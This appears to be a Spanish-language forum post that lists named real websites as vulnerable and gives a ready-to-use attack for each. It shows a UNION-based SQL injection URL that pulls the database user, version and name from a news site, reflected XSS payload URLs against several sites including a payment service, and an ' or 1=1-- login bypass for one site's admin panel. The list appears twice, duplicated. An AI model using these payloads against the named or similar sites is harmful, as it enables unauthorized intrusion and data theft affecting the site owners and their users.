Vulnerable a SQL Inyeccion:
http://www.elfinanciero.cl/ver_detallecursos.php?recordID=367+and+1=0+union+select+all+1,2,3,concat_ws(0x3A,user(),version(),database()),5,6,7,8,9,10,11,12,13,14,15+--+
XSS:
http://www.servipag.com/browse.asp?pagina=web/msgerror.htm&mensaje_error=%3C/a%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E
http://www.bathstudent.com/404/?url=%3Ch1%3E%3C/a%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E
http://www.barragantv.net:80/videos.php?pag=1<ScRiPt%20%0a%0d>alert(0)%3B</ScRiPt>
http://www.bibliodrogas.cl/biblioteca/web/resultados2.php?pag=1&solo_digital=&Buscar_Por=03&Fin_Consulta=&sec_busqueda=382758&sec_canasto=0&accion=.&FILTRO=%28+DESCRIPTORES+like+%27%25\&Txt_Busqueda=%22%3Cscript%3Ealert%28%2Fxss%2F%29%3C%2Fscript%3E
Bypass:
http://www.novovision.cl/admin/
user ' or 1=1--
pass ' or 1=1--
Vean Mis otros post!!
Mas adelante creare un post de seguridad!!!!
http://www.elfinanciero.cl/ver_detallecursos.php?recordID=367+and+1=0+union+select+all+1,2,3,concat_ws(0x3A,user(),version(),database()),5,6,7,8,9,10,11,12,13,14,15+--+
XSS:
http://www.servipag.com/browse.asp?pagina=web/msgerror.htm&mensaje_error=%3C/a%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E
http://www.bathstudent.com/404/?url=%3Ch1%3E%3C/a%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E
http://www.barragantv.net:80/videos.php?pag=1<ScRiPt%20%0a%0d>alert(0)%3B</ScRiPt>
http://www.bibliodrogas.cl/biblioteca/web/resultados2.php?pag=1&solo_digital=&Buscar_Por=03&Fin_Consulta=&sec_busqueda=382758&sec_canasto=0&accion=.&FILTRO=%28+DESCRIPTORES+like+%27%25\&Txt_Busqueda=%22%3Cscript%3Ealert%28%2Fxss%2F%29%3C%2Fscript%3E
Bypass:
http://www.novovision.cl/admin/
user ' or 1=1--
pass ' or 1=1--
Vean Mis otros post!!
Mas adelante creare un post de seguridad!!!!